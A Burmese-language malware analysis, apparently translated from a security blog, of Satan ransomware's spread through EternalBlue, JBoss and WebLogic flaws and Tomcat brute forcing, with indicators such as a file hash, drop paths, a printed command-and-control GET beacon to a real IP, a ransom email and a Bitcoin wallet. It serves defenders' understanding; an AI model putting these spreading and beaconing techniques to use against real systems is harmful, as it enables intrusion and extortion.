Satan Ransomware များ ပျံ့နှံ့စေသည့် နည်းလမ်းအသစ်များ

Satan Ransomware ကို Bleeping Computer Website မှ ဇန်နဝါရီလ ၂၀၁၇တွင် ပထမဆုံး ထုတ်ဖော် တင်ပြခဲ့ပါသည်။ မကြာသေးမီက Satan Ransomware သည် EternalBlue exploit ကို အသုံးပြုကာ ပျံ့နှံ့စေခဲ့ သည်ဟု သတ်မှတ်ခြင်းခံရပါသည်။ ၎င်း exploit သည် WannaCry Ransomware တွင် အသုံးပြုခဲ့သော exploit ပင်ဖြစ်သည်။ Microsoft မှ မတ်လ ၂၀၁၇ တွင် EternalBlue နှင့် ဆက်စပ်နေသော အားနည်းချက်များကို ပြန်လည်ဖာထေးခဲ့သော်လည်း patch မလုပ်ရသေးသော ကွန်ပျူတာများ ကျန်ရှိနေဆဲပင်ဖြစ်သည်။ Satan Ransomware မှ EternalBlue ကို အသုံးပြုရုံသာမက တစ်ခြားပျံ့နှံ့စေသည့် နည်းလမ်းများကိုလည်း အသုံးပြု ထားသည်ဟု သတ်မှတ်ခြင်းခံရသည်။

 

 

Satan Ransomware သည်

  • JBoss CVE-2017-12149
  • Weblogic CVE-2017-10271
  • EternalBlue exploit CVE-2017-0143
  • Tomcat web application brute forcing စသည့် vulnerability များကို အသုံးပြုကာ ပျံ့နှံ့စေခြင်း  ဖြစ်သည်။

Malware Analysis

အောက်တွင် ဖော်ပြထားသော sample သည် Satan Ransomware မှ ၂၀၁၈ မေလအစောပိုင်းတွင် အထက်ဖော်ပြပါ နည်းလမ်းများကို အသုံးပြု၍ ပျံ့နှံ့စေခြင်းကို analyze ပြုလုပ်ထားခြင်းပင်ဖြစ်သည်။

Name: sts.exe

File size: 1.7 Mb

MD5: c290cd24892905fbcf3cb39929de19a5

 

Analyzed ပြုလုပ်မည့် sample တွင် ပထမဆုံးမြင်ရသည့် အရာသည် ၎င်း malware ကို MPRESS packer ဖြင့် pack လုပ်ထားခြင်းကို တွေ့မြင်ရမည်ဖြစ်သည်။

Image removed.

 

၎င်း sample အဓိကရည်ရွယ်ချက်သည် Satan Ransomware ကို drop လုပ်စေပြီး ပစ်မှတ်ကွန်ပျူတာကို encrypt ပြုလုပ်စေကာ Bitcoin payment ကို တောင်းဆိုခြင်းဖြစ်သည်။ ထို့နောက် ၎င်းsampleသည် EternalBlue ကဲ့သို့သော exploits များကို အသုံးပြုကာ network အတွင်း ပျံ့နှံ့စေခြင်းဖြစ်သည်။

 

EternalBlue

Image removed.

 

Satan malware သည် များစွာသော EternalBlue files များကို ပစ်မှတ်ကွန်ပျူတာဆီသို့ drop ပြုလုပ်ပါသည်။ ၎င်းfile များသည် မည်သည့်ပြုပြင်ပြောင်းလဲမှုများ ပြုလုပ်မထားသော  EternalBlue exploits public version များပင် ဖြစ် သည်။ ထို file အားလုံးကို ကူးစက်ခံထားရသော system အတွင်းရှိ C:\Users\All Users\  directory အောက်တွင် drop လုပ်မည်ဖြစ်သည်။

sts.exe file သည် တူညီသော network segment အတွင်းရှိ system များအားလုံးကို scanning ဖတ်ခြင်းအားဖြင့် network တစ်လျှောက် ပျံ့နှံ့စေခြင်းကို စတင်သည်။  အောက်တွင် ပြသထားသော command line ကို အသုံးပြုခြင်းအားဖြင့် SMB EternalBlue exploits ကိုအားနည်းချက်ရှိသည့် system များသည် dropped လုပ်ထားပြီးသော library file ဖြစ်သည့် down64.dll ကို execute ပြုလုပ်မည်ဖြစ်သည်။

Image removed.

down64.dll file သည် ပစ်မှတ်ကွန်ပျူတာ၏memory တွင် code များကို load ပြုလုပ်နိုင်ရန် ကြိုးပမ်းသည်။ ထို့နောက် Microsoft တရားဝင် certutil.exe tool ကို အသုံးပြုကာ sts.exe ကို download ပြုလုပ်စေသည်။

Image removed.

 

၎င်း sample သည် တစ်ခြားnetwork များ၏activity ကိုအသုံးပြုကာ network တစ်လျှောက် ပျံ့နှံ့ခြင်းကို ဆက်လက်ဖြစ်ပွားစေသည်။ Compromised ပြုလုပ်ခြင်းခံထားရသော system သည် Clist1.jsp ဆီသို့  HTTP PUT request ကို ပြုလုပ်စေကာ jsp file မှ ပစ်မှတ်ထားသော server ဆီတွင် sts.exe file ကို download ပြုလုပ်နိုင်စေသည်။

အခြား system များကို ကူးစက်စေရန် အသုံးပြုသည့် အခြားစိတ်ဝင်စားဖွယ်ကောင်းသော နည်းပညာသည် Apache Tomcat server ကို bruteforce ပြုလုပ်ခြင်းပင်ဖြစ်သည်။ /manager/html file ဆီသို့ HTTP GET request ကိုပြုလုပ်ပြီး ၎င်း၏ response သည် “401 not authorized,” ဖြစ်ပါက အသုံးများသော usernames နှင့် passwords စာရင်းကို အသုံးပြုကာ ၎င်း file ဆီသို့ bruteforce access ကို စတင်ခြင်းပင်ဖြစ်သည်။

 

Image removed.

 

Encryption

Same network အတွင်းရှိ အခြား system များကို ကူးစက်စေပြီးနောက် နောက်ဆုံးတွင် Satan Ransomware ကို C:\Satan.exe file အဖြစ် drop လုပ်စေသည်။ ၎င်းexecutable file ကို မူလ sample အတိုင်း MPRESS ဖြင့် pack လုပ်ထားခြင်းဖြစ်သည်။

 

Image removed.

 

Satan.exe ကို execute ပြုလုပ်စေကာ ransomware attack ကို စတင်ပြီး အောက်တွင်ပြသထားသည့်အတိုင်း process များကို ရပ်တန့်သွားစေသည်။

 

Image removed.

 

Satan.exe file သည် “C:\Windows\Temp\KSession” directory အောက်တွင် KSession ဟူသော file ကို ဖန်တီးကာ ၎င်းထဲတွင် host identifier ကိုသိမ်းဆည်းထားစေသည်။

Encrypted ပြုလုပ်ထားပြီးသော files များကို satan_pro@mail.ru ဖြင့် <original_filename>.satan format အဖြစ် rename ပြုလုပ်သည်။ ထို့နောက် KSession file တွင် သိမ်းဆည်းထားသော parameter value များကို အသုံးပြုကာ GET requests ကို ပြုလုပ်ခြင်းဖြင့် Command နှင့် Control server ဆီသို့ data များ ပေးပို့စေသည်။

 

GET /data/token.php?status=ST&code=XXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1 Connection: Keep-Alive

User-Agent: Winnet Client

Host: 45.124.132.119

 

Encrypted ပြုလုပ်ပြီးနောက် Satan.exe file သည် C:\_How_to_decrypt_files.txt  directory အတွင်းသို့ instructions ရေးသားပြီး file ကို ဖန်တီးကာ notepad ဖြင့်note ကိုဖွင့်စေပါသည်။

 

Image removed.

 

ထို note တွင် system ကို decrypt ပြုလုပ်ရန် instructions များပါဝင်ပြီး satan_pro@mail[.]ru ဟူသော ဆက်သွယ်ရန် email address ပါဝင်ပြီး Bitcoinကို တောင်းခံပါသည်။

Image removed.

 

အထက်ဖော်ပြပါ Bitcoin wallet ကို ခြေရာခံသောအခါ

14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo ဟူသော Bitcoin wallet သည် ယခုလက်ရှိတွင် အနည်းငယ်သော payment ကိုသာ လက်ခံရရှိပါသေးသည်။ နောက်ဆုံး payment မှာ မေလ ၂၀၁၈ တွင် ဖြစ်ပြီး ၎င်း၏balance မှာ 0.5 BTC ဖြစ်ပြီး ယခုရေးသားနေချိန်တွင် ခန့်မှန်းခြေ $3600 တန်ကြေးရှိသည်။

Image removed.

 

နိဂုံး

Ransomware ဆက်လက်ရှင်သန်နေခြင်းနှင့် အောင်အောင်မြင်မြင် ဆက်လက်ပြန့်ပွားနိုင်စေရန် အမျိုးမျိုးသော exploit များနှင့်နည်းလမ်းများ ပါဝင်လာနိုင်စေအောင် မွမ်းမံပြင်ဆင်နေခြင်းသည် စိုးရိမ်ဖွယ်ရာကောင်းသော အလားအလာရှိ ပါကြောင်း ရေးသားဖော်ပြအပ်ပါသည်။

 

Ref: https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread?utm_medium=Social&utm_source=THN&utm_content=SP&utm_campaign=Satan-Ransomware_Blog